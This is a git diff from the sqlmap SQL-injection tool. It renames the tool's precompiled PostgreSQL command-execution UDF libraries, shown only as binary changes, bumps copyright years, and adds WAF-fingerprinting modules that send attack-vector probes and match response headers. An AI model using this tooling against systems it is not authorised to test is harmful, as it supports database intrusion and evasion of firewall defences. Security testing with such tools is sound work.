diff --git a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..a194bcb45
Binary files /dev/null and b/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so
deleted file mode 100755
index eb20b094e..000000000
Binary files a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..13a55a367
Binary files /dev/null and b/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so
deleted file mode 100755
index 9e07a823f..000000000
Binary files a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..c87247f8e
Binary files /dev/null and b/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so
deleted file mode 100755
index ddf07c98e..000000000
Binary files a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..f24c34824
Binary files /dev/null and b/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so
deleted file mode 100755
index d1c700e90..000000000
Binary files a/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..520350650
Binary files /dev/null and b/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..72bc101db
Binary files /dev/null and b/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..3a0973d84
Binary files /dev/null and b/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..3b8c49630
Binary files /dev/null and b/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so
deleted file mode 100755
index 02e7e09ba..000000000
Binary files a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..996fdf0dc
Binary files /dev/null and b/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so
deleted file mode 100755
index 5dd842a4b..000000000
Binary files a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..905e48886
Binary files /dev/null and b/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so
deleted file mode 100755
index 80eec1a74..000000000
Binary files a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..bd5c1ceee
Binary files /dev/null and b/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so
deleted file mode 100755
index 7c29ff7a3..000000000
Binary files a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..43c4427f9
Binary files /dev/null and b/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..eee10ec8c
Binary files /dev/null and b/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..0fcb1913d
Binary files /dev/null and b/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..dd554a419
Binary files /dev/null and b/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
new file mode 100644
index 000000000..ab5b6a8e6
Binary files /dev/null and b/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll
deleted file mode 100755
index 342d45a08..000000000
Binary files a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
new file mode 100644
index 000000000..2d3ce9f9e
Binary files /dev/null and b/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ
diff --git a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll
deleted file mode 100755
index 9113b56c2..000000000
Binary files a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
new file mode 100644
index 000000000..c4fd18d28
Binary files /dev/null and b/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ
diff --git a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll
deleted file mode 100755
index 43ba07ad6..000000000
Binary files a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
new file mode 100644
index 000000000..2beba1d4c
Binary files /dev/null and b/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ
diff --git a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll
deleted file mode 100644
index 5df72e78a..000000000
Binary files a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
new file mode 100644
index 000000000..612535c70
Binary files /dev/null and b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ
diff --git a/waf/360.py b/waf/360.py
new file mode 100644
index 000000000..86c251c20
--- /dev/null
+++ b/waf/360.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "360 Web Application Firewall (360)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"wangzhan\.360\.cn", headers.get("X-Powered-By-360wzb", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval
diff --git a/waf/__init__.py b/waf/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/waf/__init__.py
+++ b/waf/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/airlock.py b/waf/airlock.py
index 39efadac6..6a5b433b7 100644
--- a/waf/airlock.py
+++ b/waf/airlock.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/anquanbao.py b/waf/anquanbao.py
new file mode 100644
index 000000000..6842c8a35
--- /dev/null
+++ b/waf/anquanbao.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Anquanbao Web Application Firewall (Anquanbao)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"MISS", headers.get("X-Powered-By-Anquanbao", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval
diff --git a/waf/baidu.py b/waf/baidu.py
new file mode 100644
index 000000000..7a15feadb
--- /dev/null
+++ b/waf/baidu.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Yunjiasu Web Application Firewall (Baidu)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval
diff --git a/waf/barracuda.py b/waf/barracuda.py
index ad81087db..41866a8ad 100644
--- a/waf/barracuda.py
+++ b/waf/barracuda.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -18,6 +18,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retval = re.search(r"\Abarra_counter_session=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
+        retval |= re.search(r"(\A|\b)barracuda_", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
         if retval:
             break
 
diff --git a/waf/bigip.py b/waf/bigip.py
index f5b844e32..4023d0395 100644
--- a/waf/bigip.py
+++ b/waf/bigip.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/binarysec.py b/waf/binarysec.py
index 876d69da7..268a8a2e2 100644
--- a/waf/binarysec.py
+++ b/waf/binarysec.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/blockdos.py b/waf/blockdos.py
new file mode 100644
index 000000000..adcc902e3
--- /dev/null
+++ b/waf/blockdos.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "BlockDoS"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"BlockDos\.net", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        if retval:
+            break
+
+    return retval
diff --git a/waf/ciscoacexml.py b/waf/ciscoacexml.py
index 7d927c6c3..89834a64e 100644
--- a/waf/ciscoacexml.py
+++ b/waf/ciscoacexml.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/cloudflare.py b/waf/cloudflare.py
index c0aa259d9..cdae41bb4 100644
--- a/waf/cloudflare.py
+++ b/waf/cloudflare.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/datapower.py b/waf/datapower.py
index 5750f2a56..1dd60df25 100644
--- a/waf/datapower.py
+++ b/waf/datapower.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/denyall.py b/waf/denyall.py
index 3db1459a8..46189389b 100644
--- a/waf/denyall.py
+++ b/waf/denyall.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/dotdefender.py b/waf/dotdefender.py
index 6abe1d908..4cf42822c 100644
--- a/waf/dotdefender.py
+++ b/waf/dotdefender.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/edgecast.py b/waf/edgecast.py
new file mode 100644
index 000000000..ec2227055
--- /dev/null
+++ b/waf/edgecast.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "EdgeCast WAF (Verizon)"
+
+def detect(get_page):
+    retVal = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retVal = code == 400 and re.search(r"\AECDF", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        if retVal:
+            break
+
+    return retVal
diff --git a/waf/expressionengine.py b/waf/expressionengine.py
new file mode 100644
index 000000000..3db06cb21
--- /dev/null
+++ b/waf/expressionengine.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "ExpressionEngine (EllisLab)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = "Invalid GET Data" in page
+        if retval:
+            break
+
+    return retval
diff --git a/waf/fortiweb.py b/waf/fortiweb.py
index 99c2de225..a5200ab9e 100644
--- a/waf/fortiweb.py
+++ b/waf/fortiweb.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/hyperguard.py b/waf/hyperguard.py
index 421409222..677789f24 100644
--- a/waf/hyperguard.py
+++ b/waf/hyperguard.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/incapsula.py b/waf/incapsula.py
index 4c8a2d2d5..1b2196e55 100644
--- a/waf/incapsula.py
+++ b/waf/incapsula.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/isaserver.py b/waf/isaserver.py
index c3ab334de..c88cf4370 100644
--- a/waf/isaserver.py
+++ b/waf/isaserver.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/jiasule.py b/waf/jiasule.py
index d3b5aeb4f..3d088f74c 100644
--- a/waf/jiasule.py
+++ b/waf/jiasule.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -18,6 +18,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retval = re.search(r"jiasule-WAF", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        retval |= re.search(r"__jsluid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
         retval |= re.search(r"static\.jiasule\.com/static/js/http_error\.js", page, re.I) is not None
         if retval:
             break
diff --git a/waf/knownsec.py b/waf/knownsec.py
index 5fa0043b6..95fcae433 100644
--- a/waf/knownsec.py
+++ b/waf/knownsec.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/kona.py b/waf/kona.py
index d958ad9ec..731cd6f99 100644
--- a/waf/kona.py
+++ b/waf/kona.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/modsecurity.py b/waf/modsecurity.py
index 6827d6945..673438f80 100644
--- a/waf/modsecurity.py
+++ b/waf/modsecurity.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -19,6 +19,7 @@ def detect(get_page):
         page, headers, code = get_page(get=vector)
         retval = code == 501 and re.search(r"Reference #[0-9A-Fa-f.]+", page, re.I) is None
         retval |= re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        retval |= "This error was generated by Mod_Security" in page
         if retval:
             break
 
diff --git a/waf/netcontinuum.py b/waf/netcontinuum.py
index b37a0ceba..c8a29774b 100644
--- a/waf/netcontinuum.py
+++ b/waf/netcontinuum.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/netscaler.py b/waf/netscaler.py
index 4afe51b18..fe6b817a2 100644
--- a/waf/netscaler.py
+++ b/waf/netscaler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/paloalto.py b/waf/paloalto.py
index 4e9974c87..6c281e575 100644
--- a/waf/paloalto.py
+++ b/waf/paloalto.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/profense.py b/waf/profense.py
index 4745c8bd3..2bd00b0e7 100644
--- a/waf/profense.py
+++ b/waf/profense.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/proventia.py b/waf/proventia.py
index a5def9a72..7630b3b54 100644
--- a/waf/proventia.py
+++ b/waf/proventia.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/radware.py b/waf/radware.py
index 8cd65b125..72deba64c 100644
--- a/waf/radware.py
+++ b/waf/radware.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -17,6 +17,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retval = re.search(r"Unauthorized Activity Has Been Detected.+Case Number:", page, re.I | re.S) is not None
+        retval |= headers.get("X-SL-CompState") is not None
         if retval:
             break
 
diff --git a/waf/requestvalidationmode.py b/waf/requestvalidationmode.py
new file mode 100644
index 000000000..ad0abc9db
--- /dev/null
+++ b/waf/requestvalidationmode.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "ASP.NET RequestValidationMode (Microsoft)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = "ASP.NET has detected data in the request that is potentially dangerous" in page
+        retval |= "Request Validation has detected a potentially dangerous client input value" in page
+        if retval:
+            break
+
+    return retval
diff --git a/waf/safedog.py b/waf/safedog.py
new file mode 100644
index 000000000..31b706e18
--- /dev/null
+++ b/waf/safedog.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Safedog Web Application Firewall (Safedog)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"WAF/2.0", headers.get("X-Powered-By", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval
diff --git a/waf/secureiis.py b/waf/secureiis.py
index 6a2ad18df..425ebdfe5 100644
--- a/waf/secureiis.py
+++ b/waf/secureiis.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/senginx.py b/waf/senginx.py
new file mode 100644
index 000000000..15a4223f2
--- /dev/null
+++ b/waf/senginx.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "SEnginx (Neusoft Corporation)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = "SENGINX-ROBOT-MITIGATION" in page
+        if retval:
+            break
+
+    return retval
diff --git a/waf/sucuri.py b/waf/sucuri.py
index 1babc671e..ba25802c7 100644
--- a/waf/sucuri.py
+++ b/waf/sucuri.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -13,12 +13,12 @@ from lib.core.settings import WAF_ATTACK_VECTORS
 __product__ = "Sucuri WebSite Firewall"
 
 def detect(get_page):
-    retval = False
+    retVal = False
 
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retVal = code == 403 and re.search(r"Sucuri/Cloudproxy", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
-        if retval:
+        if retVal:
             break
 
-    return retval
+    return retVal
diff --git a/waf/teros.py b/waf/teros.py
index 5811e67d1..99afbd8c3 100644
--- a/waf/teros.py
+++ b/waf/teros.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/trafficshield.py b/waf/trafficshield.py
index 873009ae9..e90c6671e 100644
--- a/waf/trafficshield.py
+++ b/waf/trafficshield.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/urlscan.py b/waf/urlscan.py
new file mode 100644
index 000000000..7d094482c
--- /dev/null
+++ b/waf/urlscan.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "UrlScan (Microsoft)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"Rejected-By-UrlScan", headers.get(HTTP_HEADER.LOCATION, ""), re.I) is not None
+        if retval:
+            break
+
+    return retval
diff --git a/waf/uspses.py b/waf/uspses.py
index a3b7281a5..e3192298f 100644
--- a/waf/uspses.py
+++ b/waf/uspses.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
